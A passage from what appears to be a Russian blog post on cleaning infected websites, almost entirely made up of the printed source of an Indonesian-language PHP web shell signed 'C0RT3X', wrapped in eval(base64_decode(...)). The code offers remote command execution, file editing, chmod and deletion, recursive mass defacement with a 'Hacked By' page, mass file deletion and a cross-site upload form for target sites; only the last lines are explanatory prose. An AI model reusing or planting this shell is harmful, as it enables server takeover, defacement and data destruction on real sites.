		else {
			echo "<Span style='color:red;'><strong> Gagal Senpai :( </strong></span><br></center>";
			}
			}
	function hapus_massal($path,$namafile) {
		if(is_writable($path)) {
			$dira = scandir($path);
			foreach($dira as $dirb) {
				$dirc = "$path/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					if(file_exists("$path/$namafile")) {
						unlink("$path/$namafile");
					}
				} elseif($dirb === '..') {
					if(file_exists("".dirname($path)."/$namafile")) {
						unlink("".dirname($path)."/$namafile");
					}
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							if(file_exists($lokasi)) {
								echo "[<font color=lime>DELETED</font>] $lokasi<br>";
								unlink($lokasi);
								$idx = hapus_massal($dirc,$namafile);
							}
						}
					}
				}
			}
		}
	}
	function clear_fill($file,$index){
		if(file_exists($file)){
			$handle = fopen($file,'w');
			fwrite($handle,'');
			fwrite($handle,$index);
			fclose($handle);  } }

	function gass(){
		global $dirr , $index ;
		chdir($dirr);
		$me = str_replace(dirname(__FILE__).'/','',__FILE__);
		$files = scandir($dirr) ;
		$notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
		sort($files);
		$n = 0 ;
		foreach ($files as $file){
			if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
				echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
				edit_file($file,$index);
				flush();
				$n = $n +1 ;
				} 
				}
				echo "<br>";
				echo "<center><br><h3>$n Anda Telah Ngecrot  Disini </h3></center><br>";
					}
	function ListFiles($dirrall) {

    if($dh = opendir($dirrall)) {

       $files = Array();
       $inner_files = Array();
       $me = str_replace(dirname(__FILE__).'/','',__FILE__);
       $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
        while($file = readdir($dh)) {
            if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
                if(is_dir($dirrall . "/" . $file)) {
                    $inner_files = ListFiles($dirrall . "/" . $file);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
                    array_push($files, $dirrall . "/" . $file);
                }
            }
			}

			closedir($dh);
			return $files;
		}
	}
	function gass_all(){
		global $index ;
		$dirrall=$_POST['d_dir'];
		foreach (ListFiles($dirrall) as $key=>$file){
			$file = str_replace('//',"/",$file);
			echo "<center><strong>$file</strong> ===>";
			edit_file($file,$index);
			flush();
		}
		$key = $key+1;
	echo "<center><br><h3>$key Anda Telah Ngecrot  Disini  </h3></center><br>"; }
	function sabun_massal($path,$namafile,$isi_script) {
		if(is_writable($path)) {
			$dira = scandir($path);
			foreach($dira as $dirb) {
				$dirc = "$path/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>UPLOADED</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$idx = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
if($_POST['mass'] == 'onedir') {
		echo "<br> Versi Text Area<br><textarea style='background:transparent;outline:none;color:#f1284e;border:2px solid #f1284e;border-radius:2px;' name='index' rows='10' cols='67'>\n";
		$ini="http://";
		$mainpath=$_POST[d_dir];
		$file=$_POST[d_file];
		$path=opendir("$mainpath");
		$code=base64_encode($_POST[script]);
		$indx=base64_decode($code);
		while($row=readdir($path)){
		$start=@fopen("$row/$file","w+");
		$finish=@fwrite($start,$indx);
		if ($finish){
			echo"$ini$row/$file\n";
			}
		}
		echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
		$dirrall=$_POST[d_dir];$file=$_POST[d_file];
		$path=opendir("$mainpath");
		$code=base64_encode($_POST[script]);
		$indx=base64_decode($code);
		while($row=readdir($path)){$start=@fopen("$row/$file","w+");
		$finish=@fwrite($start,$indx);
		if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
		}

	}
	elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
	elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
	elseif($_POST['mass'] == 'hapusmassal') {
		echo "<div style='border: 2px solid #f1284e;border-radius:2px;width: 600px;padding-left: 5px;margin: 10px auto;resize: none;background: #000;color: #fff;font-family: kelly slab;font-size:5px;'>";
		hapus_massal($_POST['d_dir'], $_POST['d_file']); 
		echo "</div>";	}
	elseif($_POST['mass'] == 'massdeface') {
		echo "<div style='border: 2px solid #f1284e;border-radius:2px;width: 600px;padding-left: 5px;margin: 10px auto;resize: none;background: #000;color: #fff;font-family: kelly slab;font-size:5px;'>";
		sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
		echo "</div>";	}
	else {
		echo "
		<center><font style='text-decoration: underline;'>
		Pilih Type Mass:<br>
		</font>
		<select class=\"select\" name=\"mass\"  style=\"border: 2px solid #f1284e; border-radius:2px;width: 450px;height: 25px;padding-left: 5px;margin: 10px auto;resize: none;background: transparent;color: white;font-family: kelly slab;font-size: 18px;\">
		<option value=\"massdeface\">Mass Deface ALL Dir</option>
		<option value=\"sabunmematikan\">Mass Deface Bunuh Diri</option>
		<option value=\"onedir\">Mass Deface 1 Dir</option>
		<option value=\"sabunkabeh\">Mass Deface Di Tempat</option>
		<option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
		<i class='fa fa-folder-open'></i>&nbsp;<font style='text-decoration: underline;'>Directory:</font><br>
		<input type='text' name='d_dir' value='$path' class='ishiki'><br>
		<i class='fa fa-file'></i>&nbsp;<font style='text-decoration: underline;'>Filename:</font><br>
		<input type='text' name='d_file' value='t3x.htm' class='c0r'><br>
		<i class='fa fa-book'></i>&nbsp;<font style='text-decoration: underline;'>Index File:</font><br>
		<textarea name='script' class='katsumi'>Hacked By C0RT3X</textarea><br>
		<input type='submit' name='start' value='Mulai Senpai' style='font-family:kelly slab;margin-top:10px;width:100px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px;'>
		</form></center>";
		}
} elseif(isset($_GET['csrf']) == 'csrf') {
echo '<html>
<table width=100% height=50%>
<td align="center">
<h2><font color="#f1284e">[</font><i class="fa fa-upload"></i><font color="#f1284e">]</font><u><font color="#fff">Cross Site Request Forgery</font></u></h2>
<form method="post">
<i class="fa fa-link"></i>&nbsp;<font size="4"><u>URL:</u><br></font><input type="text" class="ishiki" name="url" placeholder="http://www.target.com/[path]/upload.php"><br>
<i class="fa fa-file"></i>&nbsp;<font size="4"><u>POST File:</u><br><input type="text" class="ishiki" name="pf" placeholder="*Note: Filedata / files[] / qqfile / file / dzfiles / userfile /"><br>
<input type="submit" class="upload-style" name="d" value="Kunci Senpai!">
</form><br>';
$url = $_POST["url"];
$pf = $_POST["pf"];
$d = $_POST["d"];
if($d) {
	echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' class='tatsuya' name='$pf'><input class='upload-style' type='submit' name='g' value='Upload Senpai!'></form></form><br></br>
	
</html>";
}
} elseif(isset($_GET['cmd']) == 'cmd') {
	if($_POST['cmd']) {
		echo "<pre>".exe($_POST['cmd'])."</pre>";
		}
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="#02BC8C">Change Permission Berhasil Senpai ^_^</font><br/>';
}else{
echo '<font color="red">Change Permission Gagal :(</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Mpshh" style="font-family:kelly slab;margin-top:10px;width:37px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px"/>
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="#02BC8C">Ganti Nama Berhasil Senpai ^_^</font><br/>';
}else{
echo '<font color="red">Ganti Nama Gagal :(</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Rename" style="font-family:kelly slab;margin-top:10px;width:80px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px"/>
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="#02BC8C">Berhasil Edit File Senpai ^_^</font><br/>';
}else{
echo '<font color="red">Gagal Edit File :(</font><br/>';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src" class="katsumi">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" style="font-family:kelly slab;margin-top:10px;width:70px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px"/>
</form>';
}
echo '</center>';
}else{
echo '</table><br/><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="#02BC8C">Directory Terhapus Senpai ^_^</font><br/>';
}else{
echo '<font color="red">Directory Gagal Terhapus :(                                                                                                                                                                                                                                                                                           </font><br/>';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="#02BC8C">File Terhapus</font><br/>';
}else{
echo '<font color="red">File Gagal Dihapus</font><br/>';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="5" cellpadding="3" cellspacing="5" align="center">
<tr class="first">
<td><center>Name</peller></center></td>
<td><center>Size</peller></center></td>
<td><center>Permission</peller></center></td>
<td><center>Modify</peller></center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
echo '<tr>
<td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
<td><center>--</center></td>
<td><center>';
if(is_writable($path.'/'.$dir)) echo '<font color="#02BC8C">';
elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';

echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt" class="sena">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value="+" style="font-family:kelly slab;margin-top:4px;width:35px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px"/>
</form></center></td>
</tr>';
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
<td><center>'.$size.'</center></td>
<td><center>';
if(is_writable($path.'/'.$file)) echo '<font color="#02BC8C">';
elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
echo perms($path.'/'.$file);
if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
echo '</center></td>
<td><center><form method="POST" action="?option&path='.$path.'">
<select name="opt" class="sena">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value="+" style="font-family:kelly slab;margin-top:4px;width:35px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px"/>
</form></center></td>
</tr>';
}
echo '</table>
</div>';
}
echo '<hr color="#f1284e"><center><div class="foot-style"><font color="f1284e">-</font>&nbsp;Copyright <i aria-hidden="true" class="fa fa-copyright"></i> 2019 | Designed with <i aria-hidden="true" class="fa fa-heart" style="color: red;"></i> By <a href="http://facebook.com/cortex.jp">C0RT3X</a>&nbsp;<font color="f1284e">-</font></div>
</body>
</html>';
function exe($cmd) { 	
if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} 
}
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
';
eval(base64_decode($code));
?>

Что-то подобное вам предстоит найти на вашем сайте. Надеюсь вам краткий экскурс по лечению сайта от вирусов понравился. В следующей статье постараюсь найти для вас пример.

Опубликовано в рубрикеХАКИНГ

Оставьте первый коментарий

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *